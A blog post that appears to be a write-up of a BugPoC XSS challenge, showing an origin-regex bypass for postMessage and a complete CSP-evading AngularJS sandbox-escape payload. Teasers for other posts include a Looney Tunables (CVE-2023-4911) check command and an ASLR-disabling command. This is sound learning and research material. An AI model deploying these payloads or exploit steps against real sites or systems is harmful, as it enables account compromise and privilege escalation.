Bug Poc XSS Challenge - Writeup

-

First this challnege was awesome and I learned alot from it.


Description

The challenge was that I should execute alert(domain) showing calc.buggywebsite.com, and bypassing the CSP.

Let's take a look on the challenge, first you will notice the script.js file from this file you will notice that there is a postMessage function on the website


this mean that there is a function to receiving the message from this postMessage and do action with it, if you searched on the the source code of the the main website you will notice that there is an iframe whcih include an HTML fila called fram.html this file is show the numbers and results of the calcuator on the website, open the source code and you will find a file frame.js, the file content


first line is the listener which wait the postMessage request and the executed function is receiveMessage on the function there is a filter on the requests domain (origin) the ReqEx have some issues which lead to bypass it the RegEx is 

/^http:\/\/calc.buggywebsite.com/

this RegEx can be bypassed with different ways for example the (dot) on the RegEx if you don't escape it can be a character so something like this calcXbuggywebsite.com can bypass this filter I added a simple line in my hosts file 

127.0.0.1 calc.buggywebsite.com.test.test

now I can open this calc.buggywebsite.com.test.test and it will show the localhost and if I sent a request from it to the vulnerable origin filter it will be accepted so now we bypassed the origin filter.

The other condition is if the message not include (single quotes) or (&) so show it on the page so if we write on the page's console some thing like this

postMessage('testing here')

it will be printed on the page, try a simple XSS payload and you will find another problem which is the CSP this one

script-src 'unsafe-eval' 'self'; object-src 'none'

I opened the CSP Evaluator and it show me this tow info

'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().
'self' can be problematic if you host JSONP, Angular or user uploaded files.

it really helped me now the website is using angular so I can use it to execute the XSS payload instead of the common payloads I tried to execute a simple angular code but the didn't execute it

<div ng-app>{{1+1}}</div><script src=angular.min.js></script>

notice here I included the angular file because page /frame.html not have the file, we can notice from here that there is a sandbox after thinking I tried to execute it with iframe using the srcdoc attribute like that

<iframe srcdoc="<div ng-app>{{1+1}}</div><script src=angular.min.js></script>">

and it works with me


now we just need to add the payload and the challenge solved right? no it's wrong the payload is 

{{a=toString().constructor.prototype;a.charAt=a.trim;$eval("a,alert(document.domain),a")}}

and there is a big issue here the attribute of srcdoc is using (double quotes) and the payload which will alert is using it too because we can't use (single quote), I spent a lot of hours on this step it solved with encoding the payload 

a=toString().constructor.prototype;a.charAt=a.trim;$eval("a,alert(document.domain),a")

and use it with fromCharCode fucntion so the final payload I used is

<iframe srcdoc="<script src=angular.min.js></script><div ng-app>{{$eval(({}.toString()).constructor.fromCharCode(97, 61, 116, 111, 83, 116, 114, 105, 110, 103, 40, 41, 46, 99, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114, 46, 112, 114, 111, 116, 111, 116, 121, 112, 101, 59, 97, 46, 99, 104, 97, 114, 65, 116, 61, 97, 46, 116, 114, 105, 109, 59, 36, 101, 118, 97, 108, 40, 34, 97, 44, 97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41, 44, 97, 34, 41))}}</div>"></iframe>

I added to my exploitation code 



if you ask why I encoded the payload with base64 because the closing tag of script will break the script on the exploitation code, and i got the alert

Thanks for reading.















Comments

Post a Comment

Popular posts from this blog

Exploit & Debug Looney Tunables CVE-2023-4911 Local Privilege Escalation in the glibc's ld.so

-
Image
Hoi, let's try to debug and explain CVE-2023-4911 which is a buffer overflow in the glibc loader my debugging and exploit tested on Ubuntu 22.04.2 (Jammy Jellyfish), you can read the analysis and more information from the Qualys Security writeup . POC to check if you are vulnerable or not env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help My exploit POC video takes 5m but I speeded up the video Preparing let's disable ASLR and debug our exploit echo 0 | sudo tee /proc/sys/kernel/randomize_va_space you have to know (from qualys security): On Linux, the stack is randomized in a 16GB region, and our environment strings can occupy up to 6MB (_STK_LIM / 4 * 3, in the kernel's bprm_stack_limits()): after 16GB / 6MB = 2730 tries we have a good chance of guessing the address of our environment strings. using the buffer overflow vulnerability in the tunables we will overflow the link_map struct wh
Read more

Let's Analysis STM32F103 Chip Firmware from Attify

-
Image
( بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ ) Let's start our blog. As we know any IoT device should have a firmware to run it and there is a thought that it is secure by default because it is in a board, but we know that we can dump this firmware, our firmware know is already shared with us something like training to learn basics of reversing firmware. you can download the firmware from here . if we run the file command on the firmware we will find this "STM32F103C-firmware.bin: data" and if we try to get the architecture using binwalk it will return empty result "binwalk -A STM32F103C-firmware.bin" but we don't need this because it is a famous chip and we can know what we want from google. After searching for the chip name STM32F103C we will open its default page you will know that it run using "ARM Cortex M3" we will need that later, it is time to analysis using Ghidra. Analysis Dropping the firmware file to Ghidra but it will not detect anything
Read more

Using CSRF I Got Weird Account Takeover

-
Image
Hi guys, I'm back again this bug was interesting and weird let's start. let's refer to the target's name as (target.com) I start to test the domain like what I do in my testing, I used sublist3r to enumerate the subdomains, in one of these subdomains I start to test the password reset function I sent a request to my email to change the password, i opened the link and sent the request to change the password but i used my Burp to see the request and it looks like that there is a token for CSRF I tested this token and deleted it but the change happens, that means there is no filtring for this token there is a CSRF bug here and there is another thing the token of reset password not in the request not in the cookies or in the body so i think it's in the sessions and how i knew that? I test the function of reset password I sent another link to my account and i sent the same request but it returns 403, I opened the new reset link bug didn't use it and I go b
Read more